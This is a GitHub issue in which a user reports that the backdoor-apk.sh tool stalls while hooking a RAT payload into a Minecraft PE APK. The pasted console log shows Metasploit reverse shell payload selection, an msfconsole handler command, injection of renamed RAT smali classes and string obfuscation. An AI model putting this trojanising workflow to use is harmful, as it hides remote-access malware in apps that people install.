Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Too long in "Adding hook in original smali file" stage #205

Closed
Eric-Joker opened this issue Nov 4, 2022 · 2 comments
Closed

Too long in "Adding hook in original smali file" stage #205

Eric-Joker opened this issue Nov 4, 2022 · 2 comments

Comments

@Eric-Joker
Copy link

Eric-Joker commented Nov 4, 2022

[*] Running backdoor-apk.sh v0.2.4a on time
[+] Android payload options:

  1. meterpreter/reverse_http 3) meterpreter/reverse_tcp 5) shell/reverse_https
  2. meterpreter/reverse_https 4) shell/reverse_http 6) shell/reverse_tcp
    [?] Please select an Android payload option: 3
    [?] Please enter an LHOST value: myhost
    [?] Please enter an LPORT value: myport
    [+] Android manifest permission options:
  3. Keep original
  4. Merge with payload and shuffle
    [?] Please select an Android manifest permission option: 2
    [+] Handle the payload via resource script: msfconsole -r backdoor-apk.rc
    [] Decompiling original APK file...done.
    [
    ] Locating smali file to hook in original project...done.
    [+] Package where RAT smali files will be injected: mydir
    [+] Smali file to hook RAT payload: .smali
    [] Generating RAT APK file...done.
    [
    ] Decompiling RAT APK file...done.
    [] Merging permissions of original and payload projects...done.
    [
    ] Injecting helpful Java classes in RAT APK file...done.
    [] Creating new directory in original package for RAT smali files...done.
    [+] Inject package path: com/mojang/minecraftpe/cpcae
    [+] Generated new smali class name for MainBroadcastReceiver.smali: Qxmrr
    [+] Generated new smali class name for MainService.smali: Wvfls
    [+] Generated new smali class name for Payload.smali: Hcaay
    [+] Generated new smali class name for StringObfuscator.smali: Ufgbz
    [+] Generated new smali method name for StringObfuscator.obfuscate method: zcdix
    [+] Generated new smali method name for StringObfuscator.unobfuscate method: pbukf
    [
    ] Copying RAT smali files to new directories in original project...done.
    [] Fixing RAT smali files...done.
    [
    ] Obfuscating const-string values in RAT smali files...done.
    [*] Adding hook in original smali file...

Basis“ #191 (comment) -755338263" fixed the problem that "Failed to locate smali file to hook", it was stuck for two hour at this stage.

run.log:
Value of android_name:
Value of android_class:

These two values are null

@Eric-Joker
Copy link
Author

The "run.log" file ends after deleting all files in the tmp folder.

@CodeXTF2
Copy link

CodeXTF2 commented Apr 2, 2024

was this ever fixed?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants